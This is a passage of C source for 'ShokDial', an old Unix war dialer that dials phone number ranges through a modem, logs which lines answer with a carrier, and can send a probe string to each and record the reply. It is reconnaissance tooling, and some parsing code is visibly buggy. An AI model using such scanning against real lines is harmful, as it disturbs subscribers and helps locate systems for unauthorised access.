printf("Enter string to send to carrier (when connected): ");
scanf("%512s", sendstring);
}

/* What type of dialing are we using? */
if (conf == 1)
confdial(confile); /* Read numbers to dial from a config file */

else if (useStdin == 1)
inputdial(); /* Read numbers from stdin */

else dial_number(); /* Do the scanning (used by default, instead */
/* of confdial(), inputdial(), etc.) */

/* ---------------------------------- */

hangup(); /* Hang up the modem */
close(fd); /* Close the open file descriptor of the modem */

return 0;
}

/* -------------------------------------------------- */

void version()
{
printf("This is %sS%sh%so%sk%sD%si%sa%sl %s%s%s...please keep notice of this.\n",
BOLDCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

printf("in case this program under goes some new features, fixes, etc.\n\n");

printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);

printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL);
printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
BOLDWHITE, NORMAL, PINK, NORMAL);


exit(0);
}

/* -------------------------------------------------- */

void usage()
{
printf("Usage: %s%s %s[-rhvdSsl]%s -c [config file]%s -L [logfile]%s\n\n", PINK, ProgName, BOLDWHITE, BOLDCYAN, BOLDGREEN, NORMAL);
printf("Options:\n");
printf("%s-r%s for %srandom%s (as opposed to %ssequential%s) scanning\n", BOLDCYAN, NORMAL, PINK, NORMAL, YELLOW, NORMAL);
printf("%s-h%s for %shelp%s....what you're seeing now\n", PINK, NORMAL, BOLDRED, NORMAL);
printf("%s-v%s for the %sversion%s...because this will probably undergo changes\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
printf("%s-d%s to run in the %sbackground%s.\n", BLUE, NORMAL, BOLDGREEN, NORMAL);
printf("%s-S%s to read numbers from %sstdin%s\n", PINK, NORMAL, BOLDRED, NORMAL);
printf("%s-l%s to listen for a %sresponse%s from the carrier\n", BOLDCYAN, NORMAL, PINK, NORMAL);
printf("%s-s%s to send a %sstring%s to the carrier\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
printf("%s-c%s to read phone numbers from a %sconfig file%s.\n", YELLOW, NORMAL, BOLDCYAN, NORMAL);
printf("%s-L%s to specify the %slogfile%s.\n", BOLDRED, NORMAL, PINK, NORMAL);

putchar('\n');

printf("The %slogfile%s is by default %s%s%s if not specified.\n", BOLDCYAN, NORMAL, BOLDGREEN, LOGFILE, NORMAL);
printf("The %sconfig file%s is only specified if %s-c%s option is used.\n", PINK, NORMAL, BOLDCYAN, NORMAL);

putchar('\n');
exit(1);
}

/* -------------------------------------------------- */

void intro()
{
printf("\t\t%sS%sh%so%sk%sd%si%sa%sl%s %s%s %sf%so%sr %sU%sN%si%sX%s\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL, PINK, BOLDCYAN,
BOLDGREEN, BOLDPINK, BOLDGREEN, BOLDWHITE, BOLDBLUE, NORMAL);

printf("\t\t----------------------\n");
printf("\nWell what you do here, is enter 0000 for the range to begin\n");
printf("scanning and 9999 to end scanning if you want to scan all the\n");
printf("possible ranges, but you can put 4444 for the nmber to start\n");
printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
printf("distance.\n");
printf("\nAlso, you can use random scanning (as opposed to sequential\n");
printf("scanning) by specifying the \"%s-r%s\" option...type:\n",
PINK, NORMAL);

printf("%s%s%s -h %sfor %shelp%s.\n\n",
BOLDRED, ProgName, BOLDRED, NORMAL, BOLDCYAN, NORMAL);

printf("Anyway, enjoy!\n\n");

printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);

printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
BOLDWHITE, NORMAL, PINK, NORMAL);
printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
BOLDWHITE, NORMAL, PINK, NORMAL);


printf("Hit enter to continue...\n");
getchar();
}

/* -------------------------------------------------- */

void daemonize_me()
{
pid_t pid;

if ((pid = fork()) == ERROR) {
perror("fork");
exit(ERROR);
}

if (pid != 0)
exit(0);
}

/* -------------------------------------------------- */

void get_scanrange()
{

/* Get location of numbers: local numbers or long distance numbers */
LorD:
printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ",
PINK, NORMAL, PINK, NORMAL);

while(1) {
LocalOrLong = getchar();

if (!isprint(LocalOrLong)) continue;
if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) {
printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n",
BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW,
NORMAL, YELLOW, NORMAL);
goto LorD; /* Reprint message. */
} else break;
}

if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */
if (rand != 1) { /* Using sequential scanning */

printf("Enter number to begin scan on (555-1111): ");
scanf("%3d%*c%4d", &First3Digits, &ScanMin);

local_validnum(First3Digits); /* Make sure the first 3 digits */
/* were a valid number. */

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */

} else { /* Using random scanning */

printf("Enter the first 3 digits (555 for random scanning of 555-XXXX): ");
scanf("%3d", &First3Digits);

local_validnum(First3Digits); /* Make sure the first 3 digits */
/* were a valid number. */

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */
}

/* Make sure the last 4 digits were valid */
if ((ScanMin < 0) || (ScanMin > 9999)) {
printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
exit(ERROR);
}

if (rand != 1) { /* Using sequential scanning */

printf("Enter number to end scanning on (555-9999): ");
scanf("%3d%*c%4d", &First3Digits1, &ScanMax);

local_validnum(First3Digits1); /* Make sure the first 3 digits */
/* were a valid number. */
putchar('\n');

if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK,
NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL);

exit(ERROR);
}
} else
putchar('\n');


/* -------------------- */

} else if (toupper(LocalOrLong) == 'D') { /* Use long distance numbers */

if (rand != 1) { /* Use sequential scanning */
printf("Enter number to start scanning (555-555-1111): ");
scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin);

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits, Last3Digits);

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */

/* ... */

} else { /* Using random scanning */

printf("Enter the area code and prefix digits\n(555-555 for random scanning of 555-555-XXXX): ");
scanf("%3d%*c%3d", &First3Digits, &Last3Digits);

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits, Last3Digits);

ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
/* variable to store the original number. */
}

/* Make sure the last 4 digits were valid */
if ((ScanMin < 0) || (ScanMin > 9999)) {
printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
exit(ERROR);
}

if (rand != 1) { /* Using sequential scanning */

printf("Enter number to end scanning (555-555-9999): ");
scanf("%3d%*c%3d%*c%4d", &First3Digits1, &Last3Digits1, &ScanMax);

putchar('\n');

/* Check if area code and first 3 digits of the phone num are */
/* valid. */
long_validnum(First3Digits1, Last3Digits1);

if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK,
NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL);

exit(ERROR);
}
} else
putchar('\n');

} else {
printf("You must specify \"%sL%s\" for %slocal%s or \"%sD%s\" for %slong distance%s\n",
PINK, NORMAL, BOLDCYAN, NORMAL, PINK, NORMAL, BOLDCYAN, NORMAL);
exit(ERROR);
}

}

/* -------------------------------------------------- */

void open_port()
{
if (noshow != 1) printf("Opening modem for dialing...\n");

fd = open(MODEMPORT, O_RDWR | O_NOCTTY);

if (fd == ERROR) {
perror("open");
exit(ERROR);
}

noshow = 1; /* We use this function for reopening as well */
}

/* -------------------------------------------------- */

void init_modem()
{
FILE *logfile;

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
close(fd);
exit(ERROR);
}

printf("Initializing modem (port %s%s%s)....\n", PINK, MODEMPORT, NORMAL);

/* Hang up modem if it's already on */

hangup();

numbytes = write(fd, "+++\r", 4);
check_for_error(LogFile, fd, numbytes, "write");
usleep(1000000);

numbytes = write(fd, "ATZ\r", 4);
check_for_error(LogFile, fd, numbytes, "write");
usleep(2000000); /* Use this because we're using SIGALRM which */
/* is what sleep() uses. */

memset(buf, 0, sizeof(buf));
numbytes = read(fd, buf, sizeof(buf));
check_for_error(LogFile, fd, numbytes, "read");

noOK = checkok(LogFile, fd, buf, "initializing modem");

if (noOK == 1) {
fclose(logfile);
close(fd);
exit(ERROR);
}

memset(buf, 0, sizeof(buf));

fclose(logfile);
}

/* -------------------------------------------------- */

void dial_number()
{
time_t tm; /* Where we our calendar time is stored */
FILE *logfile; /* for the log file */
char date[32]; /* Contain time scanning started/stopped */
char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
/* If long distance: phonenum = */
/* First3Digits + Last3Digits + ScanMin */

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

memset(buf, 0, sizeof(date));
memset(buf, 0, sizeof(buf));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));
fprintf(logfile, "Started scanning at/on: %s", date);

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);


if (toupper(LocalOrLong) == 'L') { /* Local call */

fprintf(logfile, "Scanning local numbers...\n");
fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
fprintf(logfile, "Starting scanning with %d-%.4d\n\n",
First3Digits, ScanMin);

fflush(logfile);

while (1) {
if (rand == 1) ScanMin = (random() % 8889) + 11;

printf("Dialing %s%d-%.4d%s...\n",
PINK, First3Digits, ScanMin, NORMAL);

memset(phonenum, 0, sizeof(phonenum));
sprintf(phonenum, "ATDT%d%.4d\r", First3Digits, ScanMin);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa.
*/

do {
numbytes = read(fd, buf, 511);

           if (sig == 1) break; 

} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Turn alarm off if we haven't already. */

if (connected == 0) noresponse++;
else if ((strstr(buf, "BUSY")) != NULL) busy++;

/* Compare the string with "CONNECT" */
if (connected == 1) { /* Sighandler sets this to 0 when */
/* it's called...meaning time out. */
#ifdef BEEP
putchar('\a');
#endif

connect++;

fprintf(logfile, "*** CONNECT *** to %d-%.4d\n",
First3Digits, ScanMin);

printf("%s*** %sCONNECT %s%s*** %s to %s%d-%.4d%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, First3Digits, ScanMin, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
perror("write");

close(fd);
fclose(logfile);
exit(ERROR);
}

response = 1; /* Sighandler will set this to 0 when it */
/* times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();

if (rand != 1) {
/* Increase ScanMin so it scans for the next number */
ScanMin++;

if (ScanMin > ScanMax) {
/* If they are different...then they are scanning */
/* something like: 555-XXXX through 556-XXXX. */

/* So now we reset everything. */

/*
* If you did: 755-XXXX through 757-XXXX, we need to
* increase the 755 and repeat until they are the same.
*/


if (First3Digits != First3Digits1) {

First3Digits++;
ScanMin = ScanMin1; /* Restored ScanMin to its */
/* original value. */
continue;
}

memset(buf, 0, sizeof(buf));

#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "\nFinished scanning %d-%.4d through %d-%d.\n",
First3Digits, ScanMin1, First3Digits, ScanMax);

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished at/on: %s", date);
fflush(logfile);

printf("Finished scanning %s%d-%.4d %sthrough %s%d-%.4d%s.\n",
BOLDCYAN, First3Digits, ScanMin1, NORMAL,
BOLDCYAN, First3Digits, ScanMax, NORMAL);

/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

printf("\t# of lines %sbusy%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW,
BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

return;
}
}

memset(phonenum, 0, sizeof(phonenum));

}
} else { /* (Long Distance call) */

memset(buf, 0, sizeof(buf));

fprintf(logfile, "Scanning long distance numbers...\n");
fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
fprintf(logfile, "Started scanning with 1-%.3d-%.3d-%.4d\n\n",
First3Digits, Last3Digits, ScanMin);

fflush(logfile);

while(1) {
if (rand == 1) ScanMin = (random() % 8889) + 1111;

printf("Dialing %s1-%.3d-%.3d-%.4d%s...\n",
PINK, First3Digits, Last3Digits, ScanMin, NORMAL);

memset(phonenum, 0, sizeof(phonenum));
sprintf(phonenum, "ATDT1%.3d%.3d%.4d\r",
First3Digits, Last3Digits, ScanMin);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout. */

sig = 0;
connected = 1; /*
* Easier to say it's connected and then
* set it to 0 if it's not than vice versa.
*/

do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0);

if (connected == 0) noresponse++;
else if ((strstr(buf, "BUSY")) != NULL) busy++;

if (connected == 1) { /* The sighandler sets this to 0 when */
/* it gets called. */

#ifdef BEEP
putchar('\a');
#endif

connect++;

fprintf(logfile, "*** CONNECT *** to 1-%.3d-%.3d-%.4d\n",
First3Digits, Last3Digits, ScanMin);
fflush(logfile);

printf("%s*** %sCONNECT %s%s*** %sto %s1-%.3d-%.3d-%.4d%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK,
First3Digits, Last3Digits, ScanMin, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
perror("write");

close(fd);
fclose(logfile);
exit(ERROR);
}

response = 1; /* The sighandler sets this to 1 if it */
/* times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}

} else { /* listen = 1, send = 0 */

response = 1; /* The sighandler sets this to 1 if it */
/* times out. */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();

if (rand != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin++;

if (ScanMin > ScanMax) {

/* If they are different...then they are scanning */
/* something like: 555-XXXX through 556-XXXX. */

/* So now we reset everything. */

/*
* If you did: 555-755-XXXX through
* 555-757-XXXX, we need to increase
* the 755 and repeat until they are the
* same.
*/


if ((First3Digits != First3Digits1)
|| (Last3Digits != Last3Digits1)) {

if (First3Digits != First3Digits1) First3Digits++;
if (Last3Digits != Last3Digits1) Last3Digits++;

ScanMin = ScanMin1; /* Restore to its original value */
continue;
}

memset(buf, 0, sizeof(buf));

#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "\nFinished scanning 1-%.3d-%.3d-%.4d through 1-%.3d-%.3d-%.4d.\n",
First3Digits, Last3Digits, ScanMin1, First3Digits,
Last3Digits, ScanMax);

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished at/on: %s", date);
fflush(logfile);

printf("Finished scanning %s1-%.3d-%.3d-%.4d%s through %s1-%.3d-%.3d-%.4d%s",
BOLDCYAN, First3Digits, Last3Digits, ScanMin1,
NORMAL, BOLDCYAN, First3Digits, Last3Digits,
ScanMax, NORMAL);

/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

printf("\t# of %sbusy (timed out)%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW,
BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);


break;
}
}

memset(phonenum, 0, sizeof(phonenum));
}
}

fclose(logfile);
}

/* --------------------------------------- */

void confdial(char *confile)
{
time_t tm; /* Where we our calendar time is stored */
FILE *logfile; /* For the log file */
FILE *confd; /* For the config file */
char date[32]; /* Contain time scanning started/stopped */
char pnum1[20]; /* Phone # without the '-'s and what not. */
char phonenum[20]; /* This will include the ATDT etc. */

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

if ((confd = fopen(confile, "r")) == NULL) {
perror("fopen");
exit(ERROR);
}

memset(buf, 0, sizeof(buf));
memset(date, 0, sizeof(date));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

printf("Reading phone numbers from \"%s%s%s\".\n", PINK, confile, NORMAL);

printf("\nNOTE: There is no checking of the phone number for -c or -s\n"
"to allow you to enter odd strings such as \"5551234,,,5#\".\n\n");

fprintf(logfile, "Started at/on: %s\n"
"Reading phone numbers from config file \"%s\".\n",
date, confile);

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);


memset(pnum1, 0, sizeof(pnum1));
memset(phonenum, 0, sizeof(phonenum));

while (!feof(confd)) {
if ((fgets(pnum, 512, confd)) == NULL) {
perror("fgets");
exit(ERROR);
}

if (pnum[0] == '\n')
continue;

if ((strstr(pnum, "#")) != NULL) {

if (pnum[0] == '#')
continue;
else {
/* Well either there are some spaces, or a */
/* number before the comment */

char *p, *p1;
char temp[20];

memset(temp, 0, sizeof(temp));

p = pnum, p1 = temp;

while(*p == '\t' || *p == ' ')
*p += 1;

if (*p == '#') /* Just some space and a comment */
continue;
else { /* Okay it's a number */
while(*p != '\t' || *p != ' ' || \
*p != '\n' || *p != '\0' || *p != '#')
*p1++ = *p++;

sprintf(pnum, "%s", temp);

}
}

}

fprintf(logfile, "Dialing %s\n", pnum);
fflush(logfile);

strip(pnum, pnum1);

printf("Dialing %s%s%s\n", BOLDCYAN, pnum, NORMAL);

sprintf(phonenum, "ATDT%s\r", pnum1);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa
*/


do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Stop the timing. */

/* Compare the string with "CONNECT" */
if (connected == 1) {
#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "*** CONNECT *** to %s", pnum);
printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, pnum, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
perror("write");
close(fd);
exit(ERROR);
}

response = 1; /* Sighandler will set this to 0 if it times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();
}

#ifdef BEEP
putchar('\a');
#endif

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished dialing at/on: %s", date);
fflush(logfile);

printf("Finished dialing!!\n");

printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

fclose(logfile);
return;
}

/* -------------------------------------- */

void inputdial()
{
time_t tm; /* Where we our calendar time is stored */
FILE *logfile; /* For the log file */
char date[32]; /* Contain time scanning started/stopped */
char phonenum[20]; /* This will include the ATDT etc. */

/* Get location of numbers: local numbers or long distance numbers */

LorD:
printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ",
PINK, NORMAL, PINK, NORMAL);

while(1) {
LocalOrLong = getchar();

if (!isprint(LocalOrLong)) continue;
if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) {
printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n",
BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW,
NORMAL, YELLOW, NORMAL);
goto LorD; /* Reprint message. */
} else break;
}

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

memset(buf, 0, sizeof(buf));
memset(date, 0, sizeof(date));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Started at/on: %s\n", date);
fprintf(logfile, "Reading phone numbers stdin.\n");

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);

memset(phonenum, 0, sizeof(phonenum));

printf("When finished, enter \"%s.%s\" as the number.\n",
BOLDWHITE, NORMAL);

printf("\nNOTE: There is no checking of the phone number for -c or -s\n"
"to allow you to enter odd strings such as \"5551234,,,5#\".\n\n");

signal(SIGINT, sighandler);
signal(SIGTERM, sighandler);

while (1) {
if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */

printf("Enter phone number (i.e. 555-5555): ");
scanf("%3d%*c%4d", &First3Digits, &ScanMin);

/* First3Digits and ScanMin will both be 0 if "." is entered */
if (First3Digits == 0 && ScanMin == 0) goto finished;

sprintf(pnum, "%.3d%.4d", First3Digits, ScanMin);

fprintf(logfile, "Dialing %.3d-%.4d\n", First3Digits, ScanMin);
fflush(logfile);

} else { /* LocalOrLong == 'D', use long distance phone numbers */

printf("Enter phone number (i.e. 555-555-5555): ");
scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin);

/* First3Digits and ScanMin will both be 0 if "." is entered */
if (First3Digits == 0 && ScanMin == 0 && Last3Digits == 0)
goto finished;

sprintf(pnum, "1%.3d%.3d%.4d", First3Digits, Last3Digits, ScanMin);

fprintf(logfile, "Dialing %.3d-%.3d-%.4d\n",
First3Digits, Last3Digits, ScanMin);
fflush(logfile);
}

sprintf(phonenum, "ATDT%s\r", pnum);
numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa
*/


do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Stop the timing. */

/* Compare the string with "CONNECT" */
if (connected == 1) {
#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "*** CONNECT *** to %s", pnum);
printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, pnum, NORMAL);

if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, sizeof(sendstring)) == ERROR) {
perror("write");
close(fd);
exit(ERROR);
}

response = 1; /* The sighandler returns 0 when it times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();
}


finished:
memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "User ended dialing at/on: %s", date);
fflush(logfile);

printf("Okay I hope you enjoyed it!\n");

printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

fclose(logfile);
return;
}

/* -------------------------------------- */

void hangup()
{
FILE *logfile;

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
